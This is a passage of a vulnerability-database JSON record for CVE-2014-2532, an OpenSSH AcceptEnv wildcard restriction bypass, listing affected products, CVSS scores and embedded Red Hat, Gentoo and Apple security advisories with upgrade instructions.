"vendor": "f5",
"version": "11.2.1"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1"
},
{
"model": "big-ip analytics hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.9.5"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.2"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0.00"
},
{
"model": "big-ip asm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip ltm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "system m4 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x357087180"
},
{
"model": "big-iq security",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.0"
},
{
"model": "big-ip analytics hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.1"
},
{
"model": "virtual i/o server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.3"
},
{
"model": "idatplex dx360 m4 water cooled type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "79190"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "2.3"
},
{
"model": "system type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x3950x638370"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"model": "big-ip psm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip gtm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-iq cloud",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.3"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "big-ip ltm hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip apm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip wom hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x2408956"
},
{
"model": "flex system manager node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8731"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "enterprise linux desktop optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x8807903"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "big-iq security",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.2"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.8.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.5"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "big-ip analytics hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "system m4 hd",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x36305466"
},
{
"model": "big-ip apm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip pem",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "big-ip gtm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "flex system compute node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x4407917"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "system m4 hd",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x36505460"
},
{
"model": "system m4 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x357087220"
},
{
"model": "big-iq security",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.5"
},
{
"model": "flex system manager node",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8734"
},
{
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0.00"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "big-ip link controller hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "big-ip gtm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip psm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.4.1"
},
{
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "3.1.1"
},
{
"model": "big-ip webaccelerator hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "virtual i/o server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2"
},
{
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "3.1"
},
{
"model": "big-ip pem hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "big-ip edge gateway hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.6"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "system m5 type",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x325054580"
},
{
"model": "big-ip edge gateway hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip psm hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
}
],
"sources": [
{
"db": "BID",
"id": "66355"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
},
{
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:oracle:communications_user_data_repository:10.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "6.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jann Horn",
"sources": [
{
"db": "BID",
"id": "66355"
}
],
"trust": 0.3
},
"cve": "CVE-2014-2532",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2014-2532",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-2532",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201403-336",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2014-2532",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-2532"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-336"
},
{
"db": "NVD",
"id": "CVE-2014-2532"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "sshd in OpenSSH before 6.6 does not properly support wildcards on AcceptEnv lines in sshd_config, which allows remote attackers to bypass intended environment restrictions by using a substring located before a wildcard character. OpenSSH is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nVersions prior to OpenSSH 6.6 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssh security, bug fix, and enhancement update\nAdvisory ID: RHSA-2014:1552-02\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1552.html\nIssue date: 2014-10-14\nCVE Names: CVE-2014-2532 CVE-2014-2653 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix two security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. \nThese packages include the core files necessary for both the OpenSSH client\nand server. \n\nIt was discovered that OpenSSH clients did not correctly verify DNS SSHFP\nrecords. A malicious server could use this flaw to force a connecting\nclient to skip the DNS SSHFP record check and require the user to perform\nmanual host verification of the DNS SSHFP record. (CVE-2014-2653)\n\nIt was found that OpenSSH did not properly handle certain AcceptEnv\nparameter values with wildcard characters. (CVE-2014-2532)\n\nThis update also fixes the following bugs:\n\n* Based on the SP800-131A information security standard, the generation of\na digital signature using the Digital Signature Algorithm (DSA) with the\nkey size of 1024 bits and RSA with the key size of less than 2048 bits is\ndisallowed after the year 2013. After this update, ssh-keygen no longer\ngenerates keys with less than 2048 bits in FIPS mode. However, the sshd\nservice accepts keys of size 1024 bits as well as larger keys for\ncompatibility reasons. (BZ#993580)\n\n* Previously, the openssh utility incorrectly set the oom_adj value to -17\nfor all of its children processes. This behavior was incorrect because the\nchildren processes were supposed to have this value set to 0. This update\napplies a patch to fix this bug and oom_adj is now properly set to 0 for\nall children processes as expected. (BZ#1010429)\n\n* Previously, if the sshd service failed to verify the checksum of an\ninstalled FIPS module using the fipscheck library, the information about\nthis failure was only provided at the standard error output of sshd. As a\nconsequence, the user could not notice this message and be uninformed when\na system had not been properly configured for FIPS mode. To fix this bug,\nthis behavior has been changed and sshd now sends such messages via the\nsyslog service. (BZ#1020803)\n\n* When keys provided by the pkcs11 library were removed from the ssh agent\nusing the \"ssh-add -e\" command, the user was prompted to enter a PIN. \nWith this update, a patch has been applied to allow the user to remove the\nkeys provided by pkcs11 without the PIN. (BZ#1042519)\n\nIn addition, this update adds the following enhancements:\n\n* With this update, ControlPersist has been added to OpenSSH. The option in\nconjunction with the ControlMaster configuration directive specifies that\nthe master connection remains open in the background after the initial\nclient connection has been closed. (BZ#953088)\n\n* When the sshd daemon is configured to force the internal SFTP session,\nand the user attempts to use a connection other than SFTP, the appropriate\nmessage is logged to the /var/log/secure file. (BZ#997377)\n\n* Support for Elliptic Curve Cryptography modes for key exchange (ECDH) and\nhost user keys (ECDSA) as specified by RFC5656 has been added to the\nopenssh packages. However, they are not enabled by default and the user has\nto enable them manually. For more information on how to configure ECDSA and\nECDH with OpenSSH, see: https://access.redhat.com/solutions/711953\n(BZ#1028335)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n953088 - OpenSSH adding ControlPersist patch to enable full usage of SSH control options\n1010429 - Openssh Incorrectly sets oom_adj in all Children after Performing a Reload\n1023043 - ssh_config manual page lists incorrect default value of KexAlgorithms\n1023044 - Fix man page for ssh-keygen because of certificate support\n1027197 - X11 Forwarding does not work with default config - error: Failed to allocate internet-domain X11 display socket\n1028643 - Connection remains when fork() fails. \n1077843 - CVE-2014-2532 openssh: AcceptEnv environment restriction bypass flaw\n1081338 - CVE-2014-2653 openssh: failure to check DNS SSHFP records in certain scenarios\n1108836 - ssh-keyscan should ignore SIGPIPE\n1111568 - AUTOCREATE_SERVER_KEYS=RSAONLY is not supported by init script\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssh-5.3p1-104.el6.src.rpm\n\ni386:\nopenssh-5.3p1-104.el6.i686.rpm\nopenssh-askpass-5.3p1-104.el6.i686.rpm\nopenssh-clients-5.3p1-104.el6.i686.rpm\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-server-5.3p1-104.el6.i686.rpm\n\nx86_64:\nopenssh-5.3p1-104.el6.x86_64.rpm\nopenssh-askpass-5.3p1-104.el6.x86_64.rpm\nopenssh-clients-5.3p1-104.el6.x86_64.rpm\nopenssh-debuginfo-5.3p1-104.el6.x86_64.rpm\nopenssh-server-5.3p1-104.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-ldap-5.3p1-104.el6.i686.rpm\npam_ssh_agent_auth-0.9.3-104.el6.i686.rpm\n\nx86_64:\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-debuginfo-5.3p1-104.el6.x86_64.rpm\nopenssh-ldap-5.3p1-104.el6.x86_64.rpm\npam_ssh_agent_auth-0.9.3-104.el6.i686.rpm\npam_ssh_agent_auth-0.9.3-104.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssh-5.3p1-104.el6.src.rpm\n\nx86_64:\nopenssh-5.3p1-104.el6.x86_64.rpm\nopenssh-clients-5.3p1-104.el6.x86_64.rpm\nopenssh-debuginfo-5.3p1-104.el6.x86_64.rpm\nopenssh-server-5.3p1-104.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssh-askpass-5.3p1-104.el6.x86_64.rpm\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-debuginfo-5.3p1-104.el6.x86_64.rpm\nopenssh-ldap-5.3p1-104.el6.x86_64.rpm\npam_ssh_agent_auth-0.9.3-104.el6.i686.rpm\npam_ssh_agent_auth-0.9.3-104.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssh-5.3p1-104.el6.src.rpm\n\ni386:\nopenssh-5.3p1-104.el6.i686.rpm\nopenssh-askpass-5.3p1-104.el6.i686.rpm\nopenssh-clients-5.3p1-104.el6.i686.rpm\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-server-5.3p1-104.el6.i686.rpm\n\nppc64:\nopenssh-5.3p1-104.el6.ppc64.rpm\nopenssh-askpass-5.3p1-104.el6.ppc64.rpm\nopenssh-clients-5.3p1-104.el6.ppc64.rpm\nopenssh-debuginfo-5.3p1-104.el6.ppc64.rpm\nopenssh-server-5.3p1-104.el6.ppc64.rpm\n\ns390x:\nopenssh-5.3p1-104.el6.s390x.rpm\nopenssh-askpass-5.3p1-104.el6.s390x.rpm\nopenssh-clients-5.3p1-104.el6.s390x.rpm\nopenssh-debuginfo-5.3p1-104.el6.s390x.rpm\nopenssh-server-5.3p1-104.el6.s390x.rpm\n\nx86_64:\nopenssh-5.3p1-104.el6.x86_64.rpm\nopenssh-askpass-5.3p1-104.el6.x86_64.rpm\nopenssh-clients-5.3p1-104.el6.x86_64.rpm\nopenssh-debuginfo-5.3p1-104.el6.x86_64.rpm\nopenssh-server-5.3p1-104.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-ldap-5.3p1-104.el6.i686.rpm\npam_ssh_agent_auth-0.9.3-104.el6.i686.rpm\n\nppc64:\nopenssh-debuginfo-5.3p1-104.el6.ppc.rpm\nopenssh-debuginfo-5.3p1-104.el6.ppc64.rpm\nopenssh-ldap-5.3p1-104.el6.ppc64.rpm\npam_ssh_agent_auth-0.9.3-104.el6.ppc.rpm\npam_ssh_agent_auth-0.9.3-104.el6.ppc64.rpm\n\ns390x:\nopenssh-debuginfo-5.3p1-104.el6.s390.rpm\nopenssh-debuginfo-5.3p1-104.el6.s390x.rpm\nopenssh-ldap-5.3p1-104.el6.s390x.rpm\npam_ssh_agent_auth-0.9.3-104.el6.s390.rpm\npam_ssh_agent_auth-0.9.3-104.el6.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-debuginfo-5.3p1-104.el6.x86_64.rpm\nopenssh-ldap-5.3p1-104.el6.x86_64.rpm\npam_ssh_agent_auth-0.9.3-104.el6.i686.rpm\npam_ssh_agent_auth-0.9.3-104.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssh-5.3p1-104.el6.src.rpm\n\ni386:\nopenssh-5.3p1-104.el6.i686.rpm\nopenssh-askpass-5.3p1-104.el6.i686.rpm\nopenssh-clients-5.3p1-104.el6.i686.rpm\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-server-5.3p1-104.el6.i686.rpm\n\nx86_64:\nopenssh-5.3p1-104.el6.x86_64.rpm\nopenssh-askpass-5.3p1-104.el6.x86_64.rpm\nopenssh-clients-5.3p1-104.el6.x86_64.rpm\nopenssh-debuginfo-5.3p1-104.el6.x86_64.rpm\nopenssh-server-5.3p1-104.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-ldap-5.3p1-104.el6.i686.rpm\npam_ssh_agent_auth-0.9.3-104.el6.i686.rpm\n\nx86_64:\nopenssh-debuginfo-5.3p1-104.el6.i686.rpm\nopenssh-debuginfo-5.3p1-104.el6.x86_64.rpm\nopenssh-ldap-5.3p1-104.el6.x86_64.rpm\npam_ssh_agent_auth-0.9.3-104.el6.i686.rpm\npam_ssh_agent_auth-0.9.3-104.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-2532.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2653.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/solutions/711953\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUPK1zXlSAg2UNWIIRAgLFAKCbc0zGun3IBr/70ChlueemUsEORgCfa8RL\nIT6RfneDJRTv3j8EqBZSrp0=\n=33Fn\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201405-06\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: OpenSSH: Multiple vulnerabilities\n Date: May 11, 2014\n Bugs: #231292, #247466, #386307, #410869, #419357, #456006, #505066\n ID: 201405-06\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSH, the worst of which\nmay allow remote attackers to execute arbitrary code. Please review\nthe CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-6.6_p1-r1\"\n\nNOTE: One or more of the issues described in this advisory have been\nfixed in previous updates. They are included in this advisory for the\nsake of completeness. It is likely that your system is already no\nlonger affected by them. \n\nReferences\n==========\n\n[ 1 ] CVE-2008-5161\n http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5161\n[ 2 ] CVE-2010-4478\n http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4478\n[ 3 ] CVE-2010-4755\n http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4755\n[ 4 ] CVE-2010-5107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5107\n[ 5 ] CVE-2011-5000\n http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5000\n[ 6 ] CVE-2012-0814\n http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0814\n[ 7 ] CVE-2014-2532\n http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2532\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201405-06.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-09-30-3 OS X El Capitan 10.11\n\nOS X El Capitan 10.11 is now available and addresses the following:\n\nAddress Book\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may be able to inject arbitrary code to\nprocesses loading the Address Book framework\nDescription: An issue existed in Address Book framework\u0027s handling\nof an environment variable. This issue was addressed through improved\nenvironment variable handling. \nCVE-ID\nCVE-2015-5897 : Dan Bastone of Gotham Digital Science\n\nAirScan\nAvailable for: Mac OS X v10.6.8 and later\nImpact: An attacker with a privileged network position may be able\nto extract payload from eSCL packets sent over a secure connection\nDescription: An issue existed in the processing of eSCL packets. \nThis issue was addressed through improved validation checks. \nCVE-ID\nCVE-2015-5853 : an anonymous researcher\n\napache_mod_php\nAvailable for: Mac OS X v10.6.8 and later\nImpact: 